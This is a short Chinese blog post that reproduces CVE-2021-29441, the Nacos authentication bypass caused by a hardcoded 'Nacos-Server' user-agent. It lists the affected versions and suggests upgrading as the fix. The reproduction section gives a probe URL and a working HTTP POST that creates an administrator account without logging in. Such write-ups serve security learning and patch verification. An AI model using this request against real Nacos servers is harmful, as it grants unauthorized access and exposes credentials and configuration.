【Nacos未授权访问漏洞(CVE-2021-29441)复现】

文章目录

  • 一、声明
  • 二、漏洞描述
  • 三、漏洞影响范围
  • 四、漏洞复现
  • 五、修复建议


一、声明

本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。


二、漏洞描述

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息


三、漏洞影响范围

Nacos版本<=Nacos 2.0.0-ALPHA.1


四、漏洞复现

1、来到登陆界面
【Nacos未授权访问漏洞(CVE-2021-29441)复现】_第1张图片
2、验证是否可能存在漏洞
未登陆情况下浏览器访问如下接口

http://x.x.x.x/nacos/v1/auth/users?pageNo=1&pageSize=1

【Nacos未授权访问漏洞(CVE-2021-29441)复现】_第2张图片出现这种界面就很可能存在漏洞

3、抓包修改数据包

POST /nacos/v1/auth/users?username=test10&password=test10
User-Agent: Nacos-Server
pageNo=1&pageSize=9

【Nacos未授权访问漏洞(CVE-2021-29441)复现】_第3张图片
发现创建用户成功

4、返回登陆界面登陆
【Nacos未授权访问漏洞(CVE-2021-29441)复现】_第4张图片


五、修复建议

升级到最新版本的 Nacos

你可能感兴趣的:(漏洞复现,网络,网络安全,web安全,php)